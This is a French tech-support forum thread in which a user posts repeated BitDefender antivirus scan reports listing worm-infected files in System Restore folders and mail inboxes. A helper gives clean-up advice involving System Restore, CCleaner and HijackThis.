                                    C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146056.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
                                    C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146056.vbs=>(unicode) Echec de la désinfection
                                    C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146056.vbs=>(unicode) Supprimé
                                    C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146057.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
                                    C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146057.vbs=>(unicode) Echec de la désinfection
                                    C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146057.vbs=>(unicode) Supprimé
                                    C:\WINDOWS\pagefile.sys.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
                                    C:\WINDOWS\pagefile.sys.vbs=>(unicode) Echec de la désinfection
                                    C:\WINDOWS\pagefile.sys.vbs=>(unicode) Supprimé
                                    D:\pagefile.sys.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
                                    D:\pagefile.sys.vbs=>(unicode) Echec de la désinfection
                                    D:\pagefile.sys.vbs=>(unicode) Supprimé
                                    D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64)=>archstored:final.exe Infecté par: Win32.Netsky.C@mm.Damaged
                                    D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64)=>archstored:final.exe Echec de la désinfection
                                    D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64)=>archstored:final.exe Supprimé
                                    D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64) Echec de la mise à jour
                                    D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64)=>archstored:word_doc_number_phone.rtf.pif Infecté par: Win32.Netsky.C@mm.Damaged
                                    D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64)=>archstored:word_doc_number_phone.rtf.pif Echec de la désinfection
                                    D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64)=>archstored:word_doc_number_phone.rtf.pif Supprimé
                                    D:\Sauvegarde\FoxMail\mail\Colelabel\in.BOX=>(base64) Echec de la mise à jour
                                    D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146042.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
                                    D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146042.vbs=>(unicode) Echec de la désinfection
                                    D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146042.vbs=>(unicode) Supprimé
                                    D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146059.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
                                    D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146059.vbs=>(unicode) Echec de la désinfection
                                    D:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146059.vbs=>(unicode) Supprimé
                                    F:\pagefile.sys.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
                                    F:\pagefile.sys.vbs=>(unicode) Echec de la désinfection
                                    F:\pagefile.sys.vbs=>(unicode) Supprimé
                                    F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146044.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
                                    F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146044.vbs=>(unicode) Echec de la désinfection
                                    F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146044.vbs=>(unicode) Supprimé
                                    F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146061.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
                                    F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146061.vbs=>(unicode) Echec de la désinfection
                                    F:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146061.vbs=>(unicode) Supprimé
                                    H:\pagefile.sys.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
                                    H:\pagefile.sys.vbs=>(unicode) Echec de la désinfection
                                    H:\pagefile.sys.vbs=>(unicode) Supprimé
                                    H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146046.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
                                    H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146046.vbs=>(unicode) Echec de la désinfection
                                    H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP550\A0146046.vbs=>(unicode) Supprimé
                                    H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146063.vbs=>(unicode) Infecté par: Win32.Worm.Vbs.Solow.B
                                    H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146063.vbs=>(unicode) Echec de la désinfection
                                    H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP551\A0146063.vbs=>(unicode) Supprimé
                                    1. Contributeur sécurité
                                      slt, ca se sont des virus dans ta messagerie thunderbird alors supprime les messages que tu ne connais pas et dans ta poubelle

                                      C:\Documents and Settings\Denis\Application Data\Thunderbird\Profiles\4yeyh7xi.default\Mail\Local Folders\Inbox=>(message 31)
                                      Infecté par: Generic.Peed.Eml.09884D34

                                      __________________

                                      ça ce sont des virus dans la restauration systeme: c'est pour cela que ça a persisté meme en faisant une restauration :

                                      désactiver la restauration système (dans DEMARRER puis TOUS LES PROG puis ACCESOIRE puis OUTILS SYSTEME puis DANS RESTAURATION SYSTEME aller dans paramètre et désactiver la restauration)
                                      puis réactive la.

                                      H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145658.vbs=>(unicode)
                                      Echec de la désinfection

                                      H:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP549\A0145658.vbs=>(unicode)
                                      Supprimé

                                      _____________________

                                      utilise pour supprimer tes traces

                                      CCLEANER: (lance un nettoyage et répare 3 fois les erreurs) sans installer la barre yahoo

                                      https://www.01net.com/telecharger/windows/Utilitaire/nettoyeurs_et_installeurs/fiches/32599.html

                                      _________________

                                      refait un scan en ligne et colle le rapport

                                      _______________

                                      si ca persiste

                                      colle un rapport hijackthis

                                      http://www.trendsecure.com/portal/en-US/tools/security_tools/hijackthis/download

                                      manuel :

                                      https://leblogdeclaude.blogspot.com/2006/10/informatique-section-hijackthis.html

                                      Je conseille de renomer Hijackthis, pour contrer une éventuelle infection de Vundo.

                                      ex:Renomme le fichier HijackThis.exe en eden.exe pour cela, fais un clic droit sur le fichier HijackThis.exe et choisis renommer dans la liste

                                      Ensuite avec Explorer créer un dossier c:\hijackthis
                                      Décompresser Hijackthis dans ce dossier.
                                      C'est important pour les sauvegardes."
                                      1. Bonsoir,
                                        Le fichier est revenu, je le retrouce à la racine de tout mes DD.
                                        J'ai fait également un scanne avec Bit défenderen voici le résultat
                                        BitDefender Online Scanner

                                        Rapport d'analyse généré à: Mon, Oct 08, 2007 - 21:41:39

                                        Voie d'analyse: A:\;C:\;D:\;E:\;F:\;G:\;H:\;

                                        Statistiques

                                        Temps
                                        01:58:41

                                        Fichiers
                                        386269

                                        Directoires
                                        14949

                                        Secteurs de boot
                                        6

                                        Archives
                                        4202

                                        Paquets programmes
                                        16344

                                        Résultats

                                        Virus identifiés
                                        7

                                        Fichiers infectés
                                        114

                                        Fichiers suspects
                                        0

                                        Avertissements
                                        0

                                        Désinfectés
                                        0

                                        Fichiers effacés
                                        223

                                        Info sur les moteurs

                                        Définition virus
                                        825589

                                        Version des moteurs
                                        AVCORE v1.0 (build 2422) (i386) (Sep 25 2007 08:26:36)

                                        Analyse des plugins
                                        14

                                        Archive des plugins
                                        38

                                        Unpack des plugins
                                        7

                                        E-mail plugins
                                        6

                                        Système plugins
                                        1

                                        Paramètres d'analyse

                                        Première action
                                        Désinfecté

                                        Seconde Action
                                        Supprimé

                                        Heuristique
                                        Oui

                                        Acceptez les avertissements
                                        Oui

                                        Extensions analysées
                                        *;

                                        Excludez les extensions

                                        Analyse d'emails
                                        Oui

                                        Analyse des Archives
                                        Oui

                                        Analyser paquets programmes
                                        Oui

                                        Analyse des fichiers
                                        Oui

                                        Analyse de boot
                                        Oui

                                        Fichier analysé
                                        Statut

                                        C:\Documents and Settings\Denis\Application Data\Thunderbird\Profiles\4yeyh7xi.default\Mail\Local Folders\Inbox=>(message 31)
                                        Infecté par: Generic.Peed.Eml.09884D34

                                        C:\Documents and Settings\Denis\Application Data\Thunderbird\Profiles\4yeyh7xi.default\Mail\Local Folders\Inbox=>(message 31)
                                        Echec de la désinfection

                                        C:\Documents and Settings\Denis\Application Data\Thunderbird\Profiles\4yeyh7xi.default\Mail\Local Folders\Inbox=>(message 31)
                                        Supprimé

                                        C:\Documents and Settings\Denis\Application Data\Thunderbird\Profiles\4yeyh7xi.default\Mail\Local Folders\Inbox
                                        Mis à jour

                                        C:\Documents and Settings\Denis\Application Data\Thunderbird\Profiles\4yeyh7xi.default\Mail\pop.free-2.fr\Inbox=>(message 31)
                                        Infecté par: Generic.Peed.Eml.8ABE2DD0

                                        C:\Documents and Settings\Denis\Application Data\Thunderbird\Profiles\4yeyh7xi.default\Mail\pop.free-2.fr\Inbox=>(message 31)
                                        Echec de la désinfection

                                        C:\Documents and Settings\Denis\Application Data\Thunderbird\Profiles\4yeyh7xi.default\Mail\pop.free-2.fr\Inbox=>(message 31)
                                        Supprimé

                                        C:\Documents and Settings\Denis\Application Data\Thunderbird\Profiles\4yeyh7xi.default\Mail\pop.free-2.fr\Inbox
                                        Mis à jour

                                        C:\pagefile.sys.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\pagefile.sys.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\pagefile.sys.vbs=>(unicode)
                                        Supprimé

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142488.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142488.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142488.vbs=>(unicode)
                                        Supprimé

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142489.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142489.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP536\A0142489.vbs=>(unicode)
                                        Supprimé

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142601.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142601.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142601.vbs=>(unicode)
                                        Supprimé

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142602.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142602.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142602.vbs=>(unicode)
                                        Supprimé

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142642.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142642.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142642.vbs=>(unicode)
                                        Supprimé

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142643.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142643.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142643.vbs=>(unicode)
                                        Supprimé

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142713.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142713.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142713.vbs=>(unicode)
                                        Supprimé

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142714.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142714.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142714.vbs=>(unicode)
                                        Supprimé

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142826.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142826.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142826.vbs=>(unicode)
                                        Supprimé

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142827.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142827.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142827.vbs=>(unicode)
                                        Supprimé

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142992.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142992.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142992.vbs=>(unicode)
                                        Supprimé

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142993.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142993.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP537\A0142993.vbs=>(unicode)
                                        Supprimé

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143057.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143057.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143057.vbs=>(unicode)
                                        Supprimé

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143058.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143058.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP538\A0143058.vbs=>(unicode)
                                        Supprimé

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143145.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143145.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143145.vbs=>(unicode)
                                        Supprimé

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143146.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143146.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143146.vbs=>(unicode)
                                        Supprimé

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143173.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143173.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143173.vbs=>(unicode)
                                        Supprimé

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143174.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143174.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143174.vbs=>(unicode)
                                        Supprimé

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143247.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143247.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143247.vbs=>(unicode)
                                        Supprimé

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143248.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143248.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP540\A0143248.vbs=>(unicode)
                                        Supprimé

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143466.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143466.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143466.vbs=>(unicode)
                                        Supprimé

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143467.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143467.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143467.vbs=>(unicode)
                                        Supprimé

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143512.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143512.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143512.vbs=>(unicode)
                                        Supprimé

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143513.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143513.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP541\A0143513.vbs=>(unicode)
                                        Supprimé

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143708.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143708.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143708.vbs=>(unicode)
                                        Supprimé

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143709.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143709.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143709.vbs=>(unicode)
                                        Supprimé

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143729.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143729.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143729.vbs=>(unicode)
                                        Supprimé

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143730.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143730.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP542\A0143730.vbs=>(unicode)
                                        Supprimé

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143834.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143834.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143834.vbs=>(unicode)
                                        Supprimé

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143835.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143835.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143835.vbs=>(unicode)
                                        Supprimé

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143859.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143859.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143859.vbs=>(unicode)
                                        Supprimé

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143860.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143860.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143860.vbs=>(unicode)
                                        Supprimé

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143904.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143904.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143904.vbs=>(unicode)
                                        Supprimé

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143906.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143906.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0143906.vbs=>(unicode)
                                        Supprimé

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144011.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144011.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144011.vbs=>(unicode)
                                        Supprimé

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144013.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144013.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP543\A0144013.vbs=>(unicode)
                                        Supprimé

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144042.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144042.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144042.vbs=>(unicode)
                                        Supprimé

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144043.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144043.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP544\A0144043.vbs=>(unicode)
                                        Supprimé

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144071.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144071.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144071.vbs=>(unicode)
                                        Supprimé

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144072.vbs=>(unicode)
                                        Infecté par: Win32.Worm.Vbs.Solow.B

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144072.vbs=>(unicode)
                                        Echec de la désinfection

                                        C:\System Volume Information\_restore{20C40FC3-84FD-48D2-A9BC-07942253132A}\RP546\A0144072.vbs=>(unicode)
                                        Supprimé

